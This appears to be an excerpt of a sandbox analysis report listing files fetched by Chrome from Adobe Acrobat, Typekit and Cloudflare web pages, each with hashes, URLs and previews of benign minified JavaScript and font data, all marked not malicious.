                  MD5:2039C7631C8BE00C1725410BDF388C95
                  SHA1:8B4661F3C225368ADD00EEE7E239604B46D389D1
                  SHA-256:E4A3D514ECC88E8D2084E7662014859677C59CE7C9A7C893C2E83D18D673942A
                  SHA-512:17CB6EABAC2E945B28EE0367A8AE932B553CA5B0F12F129E5F319EDDB3D44A35C53162DD5762D4078157DC91A3ADEDAC0B2CB7F6B325819FF9463AAFEF3B769B
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/l?primer=7fa3915bdafdf03041871920a205bef951d72bf64dd4c4460fb992e3ecc3a862&fvd=n7&v=3
                  Preview:wOF2OTTO..t...........t..........................F...p?DYNA.p?GDYN.y..H.`..,.6.$..L....x. .6...H..V.CDE....}........W.?@................\..+..s..._Z.P.....G.w..+{.C3Ox.......U./.........D|P.=.c...-*0.b(...;I $..Vc3.d..|....9..=f..,...4.~Qi]..B..z(!!@.=..m.m...@..^U.J+.@..T....~}x..WJ...E..%.0.;....I.i.L&...T.d...Qh..r.%w...K...8.1..........\`{..R..........yT.$...h.T.XqDKE.m...s.S.aS......U..V.Mz.^.j.j.3eg.S!......?...N.U(.....2..w.~[@"..Hfn.&k:.Oz.Z.KJ....o-_.s.Y.XE.P......f/4.o68...x....I...@"............%..._.W.*..\.....P....*l...O-.j^:+..k..S.........w...[..l.Z.u..4_.......].t_.mxk,8....0.gb2.e..v..ZD.....].,..g...(...m...&.(a&.)....@.8t..,-.....;...`)L./...d....j(.B...\g.-}K.Z..}.....o@.71.[.!.....c..}...L...&4.V.....6....7.ws`...d.....+..k......~g...n.......M=p.?...h.wy,...Ys.6.+..?....].K.|`k.&.....0G"..}..U.MN.....=....S... ...n...6E.bR.d.kr...J....>..r...[L....s/....93zr".L.T.tP..mb.P.......)..*....1.n....H.8./...;.T.E...5
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):153046
                  Entropy (8bit):5.322600533584021
                  Encrypted:false
                  SSDEEP:
                  MD5:220CC4D4D4587F50C7ECE941657AA182
                  SHA1:257B1DA3E753C5B256ED9B348F6278874ECA10C0
                  SHA-256:D816D30B033CE241694CD4A64B53A0D0510410EF7EF750652A2F6D682F080093
                  SHA-512:3F07A85B25D47A506335A08D4758A08AE8A99F69A9E2670E9472A93A1D533E803FE1BB1774593C55A4F590E36EFBF7373F1AF4861BAA186C69F26A5AEBDFEF94
                  Malicious:false
                  Reputation:unknown
                  URL:https://client.messaging.adobe.com/latest/AdobeMessagingClient.js?clientId=dc-prod-virgoweb
                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.AdobeMessagingClient=t():e.AdobeMessagingClient=t()}("undefined"!=typeof self?self:this,function(){return function(e){var t={};function n(a){if(t[a])return t[a].exports;var o=t[a]={i:a,l:!1,exports:{}};return e[a].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=e,n.c=t,n.d=function(e,t,a){n.o(e,t)||Object.defineProperty(e,t,{configurable:!1,enumerable:!0,get:a})},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=24)}([function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var a=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a])}return e},o=function()
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):102
                  Entropy (8bit):4.836558861910896
                  Encrypted:false
                  SSDEEP:
                  MD5:4DB68BC68C0753DAE025F7D165F98882
                  SHA1:9597012E35A79140E72E14D9464963B8016859D2
                  SHA-256:6083D9925D9C2DA8B56720763572D3FBAC9805319BE97647A57F95F84910D873
                  SHA-512:282567705E913DDBBD006A86D2F25F049A4F140BD72386D6436176BF218BAAAF6A53CC1C59825D6A74B74C5A9E8B0AE10E9083535564B9C0BFBCFB26EC1876D5
                  Malicious:false
                  Reputation:unknown
                  Preview:{"timestamp":1742988561912,"status":405,"error":"Method Not Allowed","path":"/core/v1/messaging/init"}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                  Category:downloaded
                  Size (bytes):174273
                  Entropy (8bit):5.5784353844967
                  Encrypted:false
                  SSDEEP:
                  MD5:077975686A3823306613A3BF3892AD3C
                  SHA1:7A894B1CCFACA7E8F056E7430A5805C3E017E4B3
                  SHA-256:C9C6BE8EF0B0F75050E92BE79B0793297DEC52DF7E2ECB10BE4C15C7B7F3098E
                  SHA-512:624FE4C974C1D8946E991A77F554342059883FEFC22B6FD3040F7D752B295D56F767CFE93631E6CFA39806675BB9EE501AD88C39D07EF9C4B0C9F2E72CE23BAC
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-files2-dropin/3.58.0_2.723.0/bootstrap.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="3c857e04-55e2-4ca4-b16d-50c2840d5be5",e._sentryDebugIdIdentifier="sentry-dbid-3c857e04-55e2-4ca4-b16d-50c2840d5be5")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"3cf5c6bf825d9ccdf1ebf0bfd9737649fd92cc3f"},(()=>{var e,t,r,n,o={rGn5:(e,t,r)=>{"use strict";t.J=function A4uRemoveCircle(e){var t=_extends({},e);return n.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),n.default.createElement("path",{fillRule:"evenodd",d:"M18,2A16,16,0,1,0,34,18,16,16,0,0,0,18,2ZM28,19a1,1,0,0,1-1,1H9a1,1,0,0,1-1-1V17a1,1,0,0,1,1-1H27a1,1,0,0,1,1,1Z"}))};var n=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));function _extends(){return _extends=O
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (39098)
                  Category:downloaded
                  Size (bytes):39145
                  Entropy (8bit):5.543437669908008
                  Encrypted:false
                  SSDEEP:
                  MD5:A5EB67CE0FEB912972CB168B2B5F8D54
                  SHA1:2CFB3AFD7A6E4A4F51509F13361AB9659D72854D
                  SHA-256:901977349420560CA30BA4976FC687DEDE60643192555DEDBC64EA5E3A1D2696
                  SHA-512:957789BE7CB51A82B96C9C7433065AD350FA20A1475F9EB2C6B4CD7A1A0F420F4D7D483F92F697689723690DF5A9EA39300BEAC1ECA69865844D33BCFD2D98F0
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/8590-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[8590],{yemR:(n,t,e)=>{"use strict";e.r(t),e.d(t,{default:()=>s});var o=e("cOr2"),r=e.n(o),a=e("yGwj"),l=e.n(a)()(r());l.push([n.id,".QnA__footer___EMnvq{font-size:var(--spectrum-global-dimension-font-size-75);padding:var(--spectrum-global-dimension-size-200)}.QnA__footer___EMnvq,.QnA__footer___EMnvq a{color:var(--spectrum-gray-600)}.QnA__questionInput___w8dys{background-color:var(--spectrum-global-color-gray-50);border:var(--spectrum-global-color-gray-300) solid var(--spectrum-alias-border-size-thick);border-radius:var(--spectrum-global-dimension-size-125);padding:var(--spectrum-global-dimension-size-25) var(--spectrum-global-dimension-size-25) var(--spectrum-global-dimension-size-75)}.QnA__questionInputDisabled___zuGFI{background-color:var(--spectrum-global-color-gray-200);border-color:var(--spectrum-global-color-gray-200)}.QnA__questionInputDisabledDark___yiW2R{background-color:var(--spectrum-global-color-gray-300);bo
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (39229), with no line terminators
                  Category:downloaded
                  Size (bytes):39269
                  Entropy (8bit):4.829410098555914
                  Encrypted:false
                  SSDEEP:
                  MD5:ABAF0471ECF4BD81D800D2640AC7E1F8
                  SHA1:30137CEAA7922432866DDC6515E4EAC93B8E1210
                  SHA-256:DB8AD1F0B1617018EABD9D0B7909E30D16B8262720F1E253E850F50410DD4FC1
                  SHA-512:B893FEED9DCB04B63EDB66C01497DCA5564638E2A38C5F089F5468C81B7F6A028AAE8A7E1114DDC1DACE6D3181DF69D00117D14473D636805FFAA4360971D183
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-edit-dropin/3.17.0_3.90.0/7322-chunk.js
                  Preview:"use strict";(self["webpackJsonp-edit"]=self["webpackJsonp-edit"]||[]).push([[7322],{t39f:e=>{e.exports=JSON.parse('{"badge.new":"NEW","badge.beta":"Beta","tooltip.editPDF":"Edit Text & Images","tooltip.undo":"Undo","tooltip.redo":"Redo","tooltip.addText":"Add text","tooltip.addText.nonEditSubscription":"Add text","tooltip.addText.editToolsAnon":"Add text","aria.label.addText":"Add text to the page","aria.label.addImage":"Add image to the page","tooltip.modernViewerAddText":"Add text","tooltip.modernViewerAddImage":"Add image","tooltip.addImage":"Add an image","tooltip.addImage.nonEditSubscription":"Add an image","tooltip.addImage.editToolsAnon":"Add an image","tooltip.home":"Home","tooltip.close":"Close Edit PDF","tooltip.save":"Save PDF","tooltip.image":"This is an image","tooltip.search":"Search","tooltip.textBulletList":"Bullet list","tooltip.numberedList":"Numbered list","label.close":"Close","label.save":"Save","label.cancel":"Cancel","topbar.header.editPDF":"Edit","dialog.failur
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (23469)
                  Category:downloaded
                  Size (bytes):23527
                  Entropy (8bit):5.464889952570037
                  Encrypted:false
                  SSDEEP:
                  MD5:BB4A44349A7CFCBEDA9E871AA714BF87
                  SHA1:5684C59CDC45DE610E444374C81F5A26660D5518
                  SHA-256:D850B22178614B528B7BE2B4C5E8A5A7B4B275528CA9FAD267CA1869A5EE3010
                  SHA-512:D04472986E85490FDA09A73E3AB0DCA77E4D2AB30735CDDF8B4E6E7783AC405C550B74E2FA508BED6C7B77352854CF8D84D98FA0AC5AEA2D33CABA3C7010F509
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/genAIProvider-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[4410],{pm8e:(e,t,o)=>{"use strict";o.r(t),o.d(t,{default:()=>GenAIProvider});var i=o("Uohe"),n=o("plsW"),s=o("4PKp"),r=o("PGMW"),a=o("DlMc"),c=o.n(a),l=o("4llJ"),u=o("t3LK"),d=o("Qvga"),f=o("XEZ0"),g=o("wQpj"),I=o("jHMz"),m=o("gmFL"),h=o("QPTb"),S=o("835Y"),P=o.n(S),w=o("xvBn"),v=o("lV99"),E=o("3aG4"),b=o("WsOM"),p=o("zjjr"),A=o("6Eex"),D=o("Eni7"),O=o("efTs"),_=o("YUzc"),y=o("Q+Gt"),T=o("IU3W"),N=o("mRmh"),C=o("tr63"),L=o("vS73"),M=o("zGZ6"),G=o.n(M);function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),o.push.apply(o,i)}return o}function _objectSpread(e){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{};t%2?ownKeys(Object(o),!0).forEach((function(t){_defineProperty(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getO
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):77718
                  Entropy (8bit):5.261906645709212
                  Encrypted:false
                  SSDEEP:
                  MD5:06DEF20ABD5B5FFAFED4545378AC236A
                  SHA1:32ED21C950EBB580DC92AF0904C47742164CBDF2
                  SHA-256:0C0283C7D16774A1BAFF158032B3DAF4D492400B799B2CB2C44825349AB91FEA
                  SHA-512:809BB2198EEA744C42ED84DD32D758419BE0E67BEFD228CA3EF0D72F80D6B95B91DADC4605B5E284CEB17721B90D74C86B009BE7D46C3CC5655723E13CC235AB
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/main-cc2b0ddb6319c8213e7c.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{60400:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.then((function(r){return t.resolve(e()).then((function(){return r}))}),(function(r){return t.resolve(e()).then((function(){throw r}))}))})},96792:function(e,t){"use strict";Object.defineProperty(t,"__esModul
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):774916
                  Entropy (8bit):5.502979866722399
                  Encrypted:false
                  SSDEEP:
                  MD5:C6E7E9324FBBC5FAA135D9A3F37C2087
                  SHA1:22B5648CF2EA4813E19AFF9EBE1F6D99E532C1FA
                  SHA-256:59F45CECACA1A5F123E658DA29CCCAFE9C35863D312DD223E53391FACF44C80D
                  SHA-512:E79FB251C2F11B2D8D77BC3197EAA6C484FAB32C406FFE944AFD2AC274D05342B12C2E8947F5BCF71870274DB2F74E3F4C01A8EF62EECF5248448A638FD4015E
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/pages/segmentation-1dc6a33f8d47fa57.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[780],{826161:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.CrossMedium=l;var r,o=(r=n(667294))&&r.__esModule?r:{default:r};function a(){return a=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},a.apply(this,arguments)}function i(e,t){if(null==e)return{};var n,r,o=function(e,t){if(null==e)return{};var n,r,o={},a=Object.keys(e);for(r=0;r<a.length;r++)n=a[r],t.indexOf(n)>=0||(o[n]=e[n]);return o}(e,t);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);for(r=0;r<a.length;r++)n=a[r],t.indexOf(n)>=0||Object.prototype.propertyIsEnumerable.call(e,n)&&(o[n]=e[n])}return o}function l(e){var t=e.scale,n=void 0===t?"M":t,r=i(e,["scale"]);return o.default.createElement("svg",a({},r,r),"L"===n&&o.default.createElement("path",{d:"M9.77 8.71L6.06 5l3.71-3.71A.75.75 0 1 0 8.71.23L5
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), CFF, length 39260, version 1.0
                  Category:downloaded
                  Size (bytes):39260
                  Entropy (8bit):7.993604758899025
                  Encrypted:true
                  SSDEEP:
                  MD5:35234F8ADC394C536031C99D7AC8484F
                  SHA1:12EBFA0153118FAB8664C3B8EF696B64F4EA8EB5
                  SHA-256:E024FB3F5D381FE02FA0BC243DC557D5DAFF401F1B89220EBDFDA89D5F99D207
                  SHA-512:321228BAE69BF8A5F19A2B281FFC0123BBF1F4DF6DD843CCFB7EF45E22295BA9FB33E4D436FA13BB25C14028F51E795F09D233CAA6A6A1AD7B9A5144DA6A8197
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/af/a2527e/000000000000000000017704/27/l?primer=0635fba006f1437d962ae878ad04a353e0c3568e4d5bde3554eb7e3e05ddd02d&fvd=n8&v=3
                  Preview:wOF2OTTO...\....................................F...n?DYNA.i?GDYN.Q..J.`..P...6.$..@....g. ..........@...#..p........5!.{...._..7........?.......u..{q....=....a..+...m../..N....{....N:wD..Z..Fq.U.L.%..K.T.#9.I:..... *.':@...=~....vf.....d.;.jU^..W...-...n.x.B .i...fP.sg/..?.n...M.G1..$..4uj....PdK.;......s...m..........cO..yg.w...S...fPD.aw........!a..N3.x.^R/....C8g..$Mcr.2Q.b....Xa+s.w.@......]..8.....K.6...,...C\d~#k......'B...x..z_/.>H....r...z-MO.t..+|p.). . %...=....P...i[....X..c......(t..B....U...E,D....$....<w$...Y..2..z.OU...q.7wv..\T.^..J..R..)...a@m......A....B..@'.q ..#........KW..(.os.*......./}......q.Z.....4..K..t.+])..IJ...........x.a....d.Y...qX.{_.R.P.Ym=.o..t.#KfC.....x..Rb....N.S.!..Wl,-...IW.......@:A.6...R....N...2a..!.2r-d..*......A.....q(.!8)@#......J,..G..`.......,~.Y.....z..(.?..........:W...9.]_.0.........95..o..(..4l...`..v.<.0..0..."X.!.AA......p"....%p.....=.0<...+..|.....;......b......Cq.Vq:....[......
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (48122)
                  Category:downloaded
                  Size (bytes):48123
                  Entropy (8bit):5.342998089666478
                  Encrypted:false
                  SSDEEP:
                  MD5:EA38BDA3C117E2FE01BD862003357394
                  SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                  SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                  SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                  Malicious:false
                  Reputation:unknown
                  URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                  Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):596113
                  Entropy (8bit):5.747465556266027
                  Encrypted:false
                  SSDEEP:
                  MD5:1C40D63215108EB18AFE12131BB1B03E
                  SHA1:232FD3474525160C7FC0942CD687CD010452FA47
                  SHA-256:4055B8FA65ADEFA2A065BC2B9053B38F8CC36A632A7C27B1D50E7A2B454A5450
                  SHA-512:83146AD0001C0005562CD48144147DB7D6D2FFD586184E7612D93A3701064692DCDD4A4D1537692C4E37E208801B40395A881E332ED06255E51A9D97B7CD0B74
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-viewer-dropin/3.62.0_1.1389.1/dc-view-sdk.js
                  Preview:(()=>{var e,t,n,o,r={"5NR0":(e,t,n)=>{"use strict";var o=n("YWiy");e.exports=o.createElement("svg",{viewBox:"0 0 36 36"},o.createElement("path",{d:"M22.175 4H34v28L22.175 4zm-8.336 0H2v28L13.839 4zm4.165 10.317l7.538 17.682h-4.939l-2.258-5.632h-5.517l5.176-12.05z"}))},ETG3:(e,t,n)=>{"use strict";var o=n("YWiy");e.exports=o.createElement("svg",{viewBox:"0 0 48 48"},o.createElement("path",{d:"M29.219 6H44v36L29.219 6zM18.798 6H4v36L18.798 6zm5.207 13.265l9.422 22.733h-6.173l-2.823-7.24h-6.896l6.47-15.493z"}))},XVDt:(e,t,n)=>{"use strict";var o=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e},r=_interopRequireDefault(n("EtOT")),a=_interopRequireDefault(n("YWiy"));function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}var s=function WrappedIcon(e){return a.default.createElement(r.default,o({},e,{icon:{18:n("5NR0"),24:n("ETG3")}}))};s.displayName="AdobeLogo",t.A=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):75404
                  Entropy (8bit):5.012609225492632
                  Encrypted:false
                  SSDEEP:
                  MD5:ABC1EB3EB532196024F1FEE8E0F2E97B
                  SHA1:59A4B0C494344C892554B341CB82AB9416A10209
                  SHA-256:BA11444ECBB2BDE23A82C2A517F34D48D8FDAC331D5B8ABE9905EBA42DBDD59E
                  SHA-512:C497E046B374B627D6D95E94D4B17C18BC36C04ABED4E16A449544B9DA7E2B84004B9E96C0BF434B30D094441139C89F7503519C63D1E2988F66BD17BBD1D0D1
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/3256-chunk.js
                  Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[3256],{Q49D:(r,e,a)=>{"use strict";e.I=function A4uChevronRight(r){var e=_extends({},r);return d.default.createElement("svg",_extends({viewBox:"0 0 36 36"},e,e),d.default.createElement("path",{fillRule:"evenodd",d:"M24,18v0a1.988,1.988,0,0,1-.585,1.409l-7.983,7.98a2,2,0,1,1-2.871-2.772l.049-.049L19.181,18l-6.572-6.57a2,2,0,0,1,2.773-2.87l.049.049,7.983,7.98A1.988,1.988,0,0,1,24,18Z"}))};var d=function _interopRequireDefault(r){return r&&r.__esModule?r:{default:r}}(a("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(r){for(var e=1;e<arguments.length;e++){var a=arguments[e];for(var d in a)Object.prototype.hasOwnProperty.call(a,d)&&(r[d]=a[d])}return r},_extends.apply(this,arguments)}},bTl1:(r,e,a)=>{(e=a("AXyZ")(!1)).push([r.id,':root{font-synthesis:weight}.spectrum-Card_6fdf9f{box-sizing:border-box;min-width:var(--spectrum-card-body-header-height,var(--spectrum-global-dimens
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (10689)
                  Category:downloaded
                  Size (bytes):10753
                  Entropy (8bit):5.178988063005492
                  Encrypted:false
                  SSDEEP:
                  MD5:35AE73DC9AE95F67C6133A18E66D1BD8
                  SHA1:8A722AE6FF0BE3012514581737E873DB09511738
                  SHA-256:0C1F2A4F397C08D88BE9650D0EE9B79C6CCC54B77A150CA53457C1712F4910E2
                  SHA-512:18FE14679604BE661721ED81D7047CAFF61512648BDE1B6977447E0028EAF01CFC0415ADA7BD09CF68E5D15B29C2412563B10173C1F7CBB1687E7A8472BAB1FD
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.586.0/web-push-notification-chunk.js
                  Preview:(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[862],{"7c4L":(e,t,i)=>{"use strict";i.r(t),i.d(t,{default:()=>a});var s=i("plsW"),r=i("k+8A"),n=i.n(r),o=i("IFWA");class WebPush{constructor(){this.isWebPushEnabled=null,this.deviceProvider=null,this.floodgateProvider=null,this.userProvider=null,this.logger=null,this.firebaseApp=null,this.subscribe=(e,t)=>{this.eventEmitter.on(e,t)},this.unsubscribe=(e,t)=>{this.eventEmitter.removeListener(e,t)},this.withTimeout=(e,t)=>{let i;const s=new Promise(((e,s)=>{i=setTimeout((()=>{s(new Error("Timeout waiting for service worker to be ready"))}),t)}));return Promise.race([e,s]).finally((()=>clearTimeout(i)))},this.emitEvent=(e,t)=>{this.eventEmitter.emit(e,t)},this._getPushNotificationFlagForChromium=async()=>({pushNotificationFloodgate:await this.floodgateProvider.hasFlagAsync("dc-web-push-notif")}),this._getPushNotificationFlagForSafari=async()=>({pushNotificationFloodgate:await this.floodgateProvider.hasFlagAsync("d
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (5226)
                  Category:downloaded
                  Size (bytes):5273
                  Entropy (8bit):4.863101635595155
                  Encrypted:false
                  SSDEEP:
                  MD5:27026B9C7B1CC076B1B7F0B7E1C32335
                  SHA1:B6B3DC7FA260470BB42395FEA9718559BCD068D6
                  SHA-256:A8FABAA8A99078EC8199EC0A8AA01DC9226C30F81F5112028227759EC400133E
                  SHA-512:AE007C3DCB918BA90598E3434A2549E4562BA0CEB55D0D48F3C3F1BD8934E690C7AEB519E8F020A063DFFE278C18EA2C98B92273B58482AA43BF11164A2C4D46
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-ccverbs-dropin/3.17.1_2.303.0/tile-icons.js
                  Preview:(self["webpackJsonp-ccverbs-dropin"]=self["webpackJsonp-ccverbs-dropin"]||[]).push([[7979],{kqcq:(e,l,t)=>{var C=t("YWiy");function SCCXCustomPage36(e){return C.createElement("svg",e,C.createElement("g",{fill:"none",fillRule:"evenodd"},[C.createElement("path",{fill:"#5C5CE0",fillRule:"nonzero",d:"M20.38,1 C20.7776907,1.0003501 21.1589653,1.15861503 21.44,1.44 L26.56,6.54 C26.841385,6.82103472 26.9996499,7.2023093 27,7.6 L27,10.5 L16.037037,10.5 C12.9792183,10.5 10.5,12.9792183 10.5,16.037037 L10.5,30.3851852 C10.5,30.5933466 10.5114892,30.7988266 10.5338681,31.0010256 L5,31 C3.8954305,31 3,30.1045695 3,29 L3,3 C3,1.8954305 3.8954305,1 5,1 L20.38,1 Z",opacity:".1",key:0}),C.createElement("path",{fill:"#5C5CE0",fillRule:"nonzero",d:"M20.4,0 C21,0 21.7,0.3 22.2,0.7 L22.2,0.7 L27.3,5.8 C27.7,6.3 28,6.9 28,7.6 L28,7.6 L28,10.5 L27,10.5 L27,7.6 C27,7.25714286 26.8530612,6.91428571 26.6851312,6.63440233 L26.6,6.5 L21.5,1.4 C21.2,1.2 20.8,1 20.4,1 L20.4,1 L5,1 C3.9,1 3,1.9 3,3 L3,3 L3,29 C3,30
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1587)
                  Category:downloaded
                  Size (bytes):1626
                  Entropy (8bit):5.115357893282775
                  Encrypted:false
                  SSDEEP:
                  MD5:D5E0E83B9BB0C433F45477C651A2BEBB
                  SHA1:7F4412DDFE7873A53197E73117DEE3852DC91034
                  SHA-256:3453516020DE1572184CC80D298F778D58798FBB80EA89E29D8760675CAB2BAA
                  SHA-512:CAF496A866E0CD34DA72D33459D846E8EA54875CF89E0EBAC09A5AFEA07B33613D336F2E0F70DCA94E20E903DF6187ED3C8F813C02B193877CEDAAD49010BAC2
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-conversions2-dropin/3.17.1_2.146.0/64.js
                  Preview:(self["webpackJsonp-conversions2"]=self["webpackJsonp-conversions2"]||[]).push([[64],{b8Mv:(e,l,a)=>{var t=a("YWiy");function SDCConvertToJPG18N(e){return t.createElement("svg",e,t.createElement("g",null,[t.createElement("path",{d:"M13.51025,7.72245a1.16668,1.16668,0,1,0-1.17187-1.16667A1.16669,1.16669,0,0,0,13.51025,7.72245Z",fill:"var(--iconFill, #464646)",fillRule:"evenodd",key:0}),t.createElement("path",{d:"M16.75,3H15V1.25A1.25116,1.25116,0,0,0,13.75,0H1.25A1.25116,1.25116,0,0,0,0,1.25v9.5a1.22113,1.22113,0,0,0,.26825.73792A5.5261,5.5261,0,0,1,1.5,10.39374V1.5h12V3H4.25A1.25116,1.25116,0,0,0,3,4.25V9.7124A5.49305,5.49305,0,0,1,4.5,9.5v-5h12v6.52209L14.80664,9.35547A.75225.75225,0,0,0,13.794,9.31885l-1.72364,1.46728-3.87109-3.54a.75135.75135,0,0,0-1.03127.018L4.86914,9.51862a5.47035,5.47035,0,0,1,1.73462.4l1.10718-1.0861,3.83594,3.50732a.7512.7512,0,0,0,.99218.01758l1.7041-1.45117L16.5,13.12756V13.5H9.7876A5.49305,5.49305,0,0,1,10,15h6.75A1.25116,1.25116,0,0,0,18,13.75V4.25A1.25116
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (804), with no line terminators
                  Category:downloaded
                  Size (bytes):804
                  Entropy (8bit):5.262008738141406
                  Encrypted:false
                  SSDEEP:
                  MD5:BC713871DE45B0D883DA2EA4E55B2717
